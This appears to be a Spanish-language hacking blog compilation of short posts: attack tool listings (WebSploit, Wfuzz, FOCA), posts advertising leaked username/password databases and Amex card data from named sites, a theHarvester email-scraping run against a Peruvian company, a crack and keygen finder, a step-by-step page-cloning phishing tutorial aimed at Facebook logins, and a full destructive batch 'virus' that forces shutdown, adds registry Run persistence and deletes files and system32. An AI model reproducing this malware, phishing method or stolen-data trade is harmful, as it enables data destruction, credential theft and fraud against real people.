WebSploit Framework



WebSploit es un proyecto de código abierto para:
[>] Obras de ingeniería social
[>] Scan, orugas y Análisis Web
[>] Explotador automático
[>] Los ataques de red Soporte
----
[+] Autopwn - usado de Metasploit para Escanear y explotar Target Servicio
[+] WMAP - Scan, cadenas Target usado de Metasploit WMAP Programas
[+] Formato infector - inyectar inversa y carga útil se unen en formato de archivo
[+] phpmyadmin escáner
----
[+] LFI Bypasser
[+] usuarios de Apache escáner
[+] Dir Bruter
[+] admin buscador
[+] MLITM Attack - hombre que queda en el medio, los ataques de phishing XSS
[+] MITM - Man In The Middle Attack
[+] Java Applet Attack
[+] MFOD Vector de ataque
[+] USB Ataque infección
[ +] ARP Dos Attack
[+] Ataque Killer Web
[+] Fake actualización Attack
[+] Fake punto de ataque acceso

Descargar:


http://sourceforge.net/projects/websploit/?source=directory


Deep web base de datos robadas

Estaba dando un paseo en la deep web y me encontre con estos temas una pagina donde publican los username y password de distintas web de la fecha actual pero creo que ya lo cambiaron todo.


www.mywowarmory.com

PostBy Murderdoll »Mié 24 de abril 2013 21:06
Parece que las cuentas de este sitio web estaban aquí antes, así que añadí 'em en las TIC totalidad y actualizado.





Para prevenir la propagación del material en unas pocas manos, las cosas estarán disponibles a través del servicio Privnote.
Un registro a la vez.
Amex tarjetas de crédito de base no está marcada, posiblemente algo sobrevivió, no sé, la base es relativamente antigua.
Pocos calcetines EE.UU.


[Hack Exclusive] - Más de 115.000 inicios de sesión

Postby robolove »Vie 19 de abril 2013 24:25
fondo
Los propietarios de newseasims.com no quieren pagar por su base de datos. Por lo tanto, estamos dando de forma gratuita en su lugar. Para todo el mundo.
formato
Email: Nombre de usuario: Contraseña - No hashes, todos en texto.





Anonme.sh




Anonme.sh {script bash} V1.0
Sistemas Operativos Suported: Linux Dependencias: slowloris
macchanger decrypter.py descripción de la secuencia de comandos * este script hace que tareas sencillas como los ataques DoS.

Pruebas de Penetración Inalámbrica





Las redes inalámbricas se han vuelto omnipresentes en el mundo actual. Millones de personas las utilizan por todo el mundo todos los días en sus casas, oficinas y puntos de acceso públicos para iniciar sesión en el Internet y no tanto para el trabajo personal y profesional. A pesar de que lo inalámbrico hace la vida mas fácil y nos da una gran movilidad por ejemplo, viene con sus riesgos. En los últimos tiempos, las redes inalámbricas inseguras han sido explotados para entrar en las empresas, bancos y organizaciones gubernamentales. La frecuencia de estos ataques se ha intensificado, ya que los administradores de red todavía no saben cómo conseguir una red inalámbrica segura en una forma robusta y a prueba de errores.

BackTrack 5:pruebas de penetración inalámbrica tiene como objetivo ayudar al lector a entender las inseguridades asociadas a las redes inalámbricas y cómo llevar a cabo pruebas de penetración para encontrar los fallos y vulnerabilidades. Esta es una lectura esencial para aquellos que quieran llevar a cabo auditorías de seguridad en redes inalámbricas y siempre quiso una guía paso a paso práctica para la misma. Todos los ataques inalámbricos explicados en este libro son inmediatamente continuados por una demostración práctica, el aprendizaje es muy completo.


Algunos temas a tratar


Encriptación WEP
Acelerar cracking de WPA/WPA2 PSK
sobre sniffing e inyección en WLAN
sniffing de paquetes inalámbricos
cracking EAP-TTLS
Ataques avanzados WLAN





(esta en ingles) BackTrack - Pruebas de seguridad de red inalámbrica se ve en lo que utilizan herramientas de hackers y te muestra cómo defenderse contra ellos . Teniendo usted de ningún conocimiento previo hasta llegar a un entorno completamente seguro , esta guía ofrece consejos útiles en cada paso del camino. Aprenda cómo seleccionar una tarjeta inalámbrica para trabajar con las herramientas de Backtrack , ejecute el análisis del espectro barrido usando kismet , la creación de redes de prueba , y realizar ataques contra las redes inalámbricas. Utilice las herramientas de aircrack -ng y airodump -ng para romper la encriptación inalámbrica que se utiliza en la red.




Descargar:


http://www.mediafire.com/download/wxrqha...kTrack.rar

Sacar Correos con Backtrack 5


Bueno es un script echo en python ya esta en el backtrack 5, saque los correos de los usuarios de Nextel Perú,no voy a expicar sobre los comandos y otras cosas solo sigan las imagenes

Abrimos nuestra terminal y podemos el texto de la imagen y damos enter.


Podemos ls y enter.


Podemos ./theHarvester.py y enter.


No explicare para que sirven las demas opciones ponen ./theHarvester -d nextel.com.pe -b google -l 300 damos enter y esperamos que busque nos lanzara correos al azar .



Craagle 4 buscador de seriales, keygens, Medicinas



Para los que no sepan qué es Craagle 4.0 Final les diré que es un buscador de seriales, keygens, cracks, ect.

Ahora Craagle es mucho más rápido en la búsqueda, es una búsqueda muy fácil y además tiene soporte proxy lo que hará que en la búsqueda seas anónimo.




Descargar:


Virus en Batch



¿Que son los archivos batch?


Los archivos batch, también conocidos popularmente como archivos BAT, son aplicaciones ejecutables.
Son simplemente pequeños archivo de texto plano, que contienen códigos o instrucciones escritos en el lenguaje de MSDOS, estos códigos son lo que se conoce como comandos.
Estos archivos son guardados con la extensión de archivo .bat o .cmd. Al ejecutarse alguno de ellos (dar dos clics), Windows automáticamente inicia la consola o interprete de comandos de MSDOS y ejecuta las instrucciones o códigos que contienen en grupo, de forma secuencial.




@echo off
shutdown -s -f -t 05 -c by h4x0r-Root >>badcode.exe
Regadd HKLM/software/microsoft/windows/current/version/run/v h4x0r-Root/REG_SZ/d "c:/windows/system32/f">>badcode.exe
CD%windows%SystemRoot%
CD%homepath%
CD windows
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
msg * Infection loading 45%...
start badcode.exe
CD%homepath%
CD Mis Archivos
CD system32
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
msg * Infection 80%..
start badcode.exe
del s/f/q"c:/*.mpg"
del s/f/q"c:/*.vbs"
del s/f/q"c:/*.wmv"
del s/f/q"c:/*.avi"
del s/f/q"c:/*.dll"
del s/f/q"c:/*.txt"
del s/f/q"c:/*.bak"
del s/f/q"c:/*.ico"
del s/f/q"c:/*.ini"
del s/f/q"c:/*.com"
del s/f/q"c:/*.rar"
del s/f/q"c:/*.zip"
del s/f/q"c:/*.docx"
del s/f/q"c:/*.temp"
del s/f/q"c:/*.xps"
del s/f/q"c:/*.tmp"
cd c:/windows
cd c:/windows/system32
del c:/windows/system32
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
xcopy c:/Archivos de programa/microsoft ofiice/
msg * infection 90% ...
start badcode.exe
shutdown -s -f -t 01 -c INfection complete 100%>>badcode.exe
Regadd HKLM/software/microsoft/windows/current/version/run/v h4x0r-Root/REG_SZ/d "c:/windows/system32/f">>badcode.exe
start badcode.exe

Wfuzz bruteforcer

Wfuzz es una herramienta diseñada para la fuerza bruta aplicaciones Web, que puede ser utilizado para la búsqueda de recursos no vinculados (directorios, servlets, scripts, etc), fuerza bruta GET y POST, los parámetros para el control de diferentes tipos de inyecciones (SQL, XSS, LDAP, etc), bruteforce Formularios parámetros (usuario / contraseña), fuzzing, etc
Es muy flexible, he aquí algunas funcionalidades:
Múltiples puntos de inyección con capacidad de múltiples diccionarios
La recursividad (Al hacer bruteforce directorio)
Correos, encabezados y autenticación de los datos brutos forzando
Salida a HTML
Salida de color
Ocultar resultados por código de retorno, el número de palabras, números de línea, expresiones regulares.
Las cookies fuzzing
Multi threading
El soporte de proxy
SOCK apoyo
Los retrasos entre las solicitudes
Autenticación de apoyo (NTLM, Basic)
Todos los parámetros de fuerza bruta (POST y GET)
Encoders múltiples por carga
Combinaciones de carga útil con iteradores
Solicitud de base (para filtrar los resultados en contra)
Métodos de fuerza bruta HTTP
Soporte de proxy múltiple (cada solicitud a través de un proxy diferente)
CABEZA exploración (más rápido para la localización de recursos)
Diccionarios personalizados para las aplicaciones conocidas (Weblogic, iPlanet, Tomcat, Domino, Oracle 9i, Vignette, Coldfusion y muchos más. (Diccionarios Muchos de DIRB Darkraver, elhttp://www.open-labs.org)
Carga:
Expediente
Lista
hexrand
alcance
nombres
hexrange
Codificaciones:
random_uppercase
urlencode
binary_ascii
base64
double_nibble_hex
uri_hex
sha1
md5
double_urlencode
utf8
utf8_binary
html
html decimal
costumbre
muchos más ...
Iteradores:
Producto
Cremallera
Cadena



Descargar:


https://code.google.com/p/wfuzz/downloads/list


Extracción de Meta datos



Bueno que son los Meta Datos?, meta datos es la información que se integra en archivos ya sea (word. jpg. .ppt .pps .xls .docx .pptx .ppsx, etc...) mediante softwares que los editan, ya sea Microsoft Office, Editores de Imágenes, Camaras Fotográficas, Adobe Reader, entre otros.

Al hablar de Meta Datos entramos en cierto grado, a un tema de "Analisis Forense" ya que obtenemos informacion que normalmente no esta a la vista, entonces a traves de los Meta Datos podemos obtener información ya sea, Nombres de Usuarios, Sistema Operativo, IPS entre otros.

Bueno saliendo de lo teórico pasaremos a lo practico, la herramienta llamada "FOCA"

Esta Herramienta nos permitira analizar ya sea mediante una Interfaz o Online.



H.School Hacker Academy


Este programa está diseñado para animarte a estar al día y valerte por tí mismo. El tema principal de instrucción es satisfacer la curiosidad hacker que hay en tí y guiarte progresivamente a través de una educación hacker para ayudarte a crecer en un rol responsable capaz de determinar los problemas de seguridad y privacidad y ayudarte a tomar decisiones sobre seguridad por tí mismo.

El hacking puede ser emocionante debido en parte a la naturaleza ilegal del acceso a los ordenadores. Nosotros pretendemos enseñarte que puede llegar a ser incluso más emocionante el hecho de alertar a otros sobre problemas de seguridad y hacerlos públicos sin preocuparse de ir a la carcel por ello. Como un ciudadano, en muchos países no es sólo tu derecho sino también tu responsabilidad avisar de fallos de seguridad y privacidad a las autoridades convenientes. De este modo estás ayudando a aquellos que no pueden valerse por sí mismos. Esto es lo que hacen los perros guardianes. Es lo que tú vas a aprender a hacer.




Descargar:


http://www.mediafire.com/download/cybflb...school.rar

Clonar pagina para sacar contraseñas


Escojemos la opcion 1 y enter


Despues Opcion 2 y enter


Opcion 3


Opcion 2


Cuando llegamos a este paso tendremos que saber nuestro ip de nuestra pc virtual sigan la imagen


Lo que tendremos que poner es nuestra terminal es ifconfig le damos enter y nos mostrara el ip,y regresamos a set.sh.


Colocamos el IP


Copiamos el url a clonar y cuando salga return damos enter.


Y colocamos el ip en el navegador yo pondre una cuenta inexistente .


Vemos como nos da el name y el password


Ejemplo en Facebook